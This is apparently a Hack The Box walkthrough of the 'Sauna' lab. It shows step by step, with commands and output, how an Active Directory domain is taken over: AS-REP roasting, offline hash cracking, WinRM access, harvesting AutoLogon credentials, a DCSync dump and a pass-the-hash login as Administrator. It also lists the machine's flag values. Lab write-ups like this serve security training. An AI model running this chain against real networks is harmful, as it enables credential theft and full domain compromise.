Sauna: HTB Walkthrough
7 min readJul 24, 2024
About Sauna
Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation. Possible usernames can be derived from employee full names listed on the website. With these usernames, an ASREPRoasting attack can be performed, which results in hash for an account that doesn’t require Kerberos pre-authentication. This hash can be subjected to an offline brute force attack, in order to recover the plaintext password for a user that is able to WinRM to the box. Running WinPEAS reveals that another system user has been configured to automatically login and it identifies their password. This second user also has Windows remote management permissions. BloodHound reveals that this user has the *DS-Replication-Get-Changes-All* extended right, which allows them to dump password hashes from the Domain Controller in a DCSync attack. Executing this attack returns the hash of the primary domain administrator, which can be used with Impacket psexec.py in order to gain a shell on the box as `NT_AUTHORITY\SYSTEM`.
Things to learn:
- username-anarchy: Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.
- impacket-GetNPUsers: Helps to get information on any user that has Kerberos Pre-Auth Disabled which in turn gives back TGT that could be cracked if possible and then login to the system.
- bloodhound-python: Helps to generate data on connection between system in an AD remotely.
- bloodhound: Helps to identify connections between different accounts, OU, forests, etc.
- impacket-secretdump: Help to dump hash value of users of the system.
Enumeration
┌──(shiva㉿shivamaharjan)-[~/htb/machines/sauna]
└─$ cat sauna.nmap.port
# Nmap 7.94SVN scan initiated Sun Jul 21 10:44:47 2024 as: nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49696,49720 -oN sauna.nmap.port -sCV -vvv --min-rate 5000 10.129.95.180
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.1 \d\d\d (?:[^\r\n]*\r\n(?!\r\n))*?.*\r\nServer: Virata-EmWeb/R([\d_]+)\r\nContent-Type: text/html; ?charset=UTF-8\r\nExpires: .*<title>HP (Color |)LaserJet ([\w._ -]+) '
Nmap scan report for 10.129.95.180
Host is up, received syn-ack (0.10s latency).
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-07-14 11:59:55Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open msrpc syn-ack Microsoft Windows RPC
49696/tcp open msrpc syn-ack Microsoft Windows RPC
49720/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 7734/tcp): CLEAN (Timeout)
| Check 2 (port 63652/tcp): CLEAN (Timeout)
| Check 3 (port 51839/udp): CLEAN (Timeout)
| Check 4 (port 46409/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-07-21T12:00:48
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
From above nmap scan, it can be seen that the domain name is EGOTISTICAL-BANK.local. Here, enum4linux didn’t give out any valuable information. So let’s dive into other endpoints.
By visiting the website’s about.html page, we could find a TEAM page that has some namelist.
With the help of nameslist, usernames could be generated and used to enumerate the system. Why you say, it is stated in the webpage,
Meet the team. So many bank account managers but only one security manager. Sounds about right!
But it would be hard to guess how the system has created it’s usernames as there are different ways a company can create a username. Hence, a tool Username Anarchy, could be used to generate the usernames.
Lets put the namelist in the file and use the tool to generate usernames and then use that to brute the system to confirm if that’s the case.
┌──(shiva㉿shivamaharjan)-[~/tools/windows_tools/username-anarchy]
└─$ ./username-anarchy -i team_names > usernames.lst
┌──(shiva㉿shivamaharjan)-[~/tools/windows_tools/username-anarchy]
└─$ wc -l team_names
6 team_names
┌──(shiva㉿shivamaharjan)-[~/tools/windows_tools/username-anarchy]
└─$ wc -l usernames.lst
88 usernames.lstSo, 88 usernames has been generated from 6 names.
Since, kerberos is open, it can be used to check if any user has Kerberos Pre-Auth is disabled or AS-REP Roasting attack can be performed.
What do we need for AS-REP Roasting?
- Usernames — check
- Domain name — check
- Domain ip — check
┌──(shiva㉿shivamaharjan)-[~/htb/machines/sauna]
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.local/ -usersfile usernames.lst -dc-ip 10.129.95.180 -request -format john -output kerbt
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$..redacted..@EGOTISTICAL-BANK.LOCAL:cf119f8763263b4dc..redacted..7fe9eac27ed928
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)A kerberos TGT has been replied. Let’s crack the TGT with the use of john as the reply was shown in johnTheRipper format.
┌──(shiva㉿shivamaharjan)-[~/htb/machines/sauna]
└─$ john kerbt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
T..redacted..3 ($krb5asrep$..redacted..@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:05 DONE (2024-07-24 10:39) 0.1683g/s 1774Kp/s 1774Kc/s 1774KC/s Tiffani1432..Thanongsuk_police
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Let’s login to the system with the use of password and username.
┌──(shiva㉿shivamaharjan)-[~/htb/machines/sauna]
└─$ evil-winrm -i 10.129.95.180 -u redacted
Enter Password:
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\redacted\Documents> cat ../Desktop/user.txt
0fadc2aa5d280beb7b99d8c7bc2843c7
*Evil-WinRM* PS C:\Users\redacted\Documents>Upon the use of winpeas, following data can be extracted.
*Evil-WinRM* PS C:\Users\redacted\Documents> upload winpeas.exe
Info: Uploading /home/shiva/htb/machines/sauna/winpeas.exe to C:\Users\redacted\Documents\winpeas.exe
Data: 2979840 bytes of 2979840 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\redacted\Documents> ./winpeas.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
....snip....
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Mo..redacted..nd!
....snip....Let’s get the relationship between the system with the use of bloodhound.
┌──(shiva㉿shivamaharjan)-[~/htb/machines/sauna]
└─$ bloodhound-python -d Egotistical-bank.local -ns 10.129.95.180 -u fsmith -c All
Password:
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (SAU NA.EGOTISTICAL-BANK.LOCAL:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 21S
Since, svc_loanmanager has DCSync permission on Egotistical-Bank.local, hash of the system can be dumped. But to keep in mind from the above picture is that the username is svc_loanmgr, not svc_loanmanager.
┌──(shiva㉿shivamaharjan)-[~/htb/machines/sauna]
└─$ impacket-secretsdump svc_loanmgr@10.129.95.180
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073..redacted..6c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cf..redacted..d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428..redacted..e466e2c:::
..snip..
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...Let’s login as Administrator.
┌──(shiva㉿shivamaharjan)-[~/htb/machines/sauna]
└─$ evil-winrm -u administrator -H 823452073d..redacted..f86c7f98e -i 10.129.95.180
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
737fb6ccc7e9bd6083e0bf12404a51f8
*Evil-WinRM* PS C:\Users\Administrator\Documents>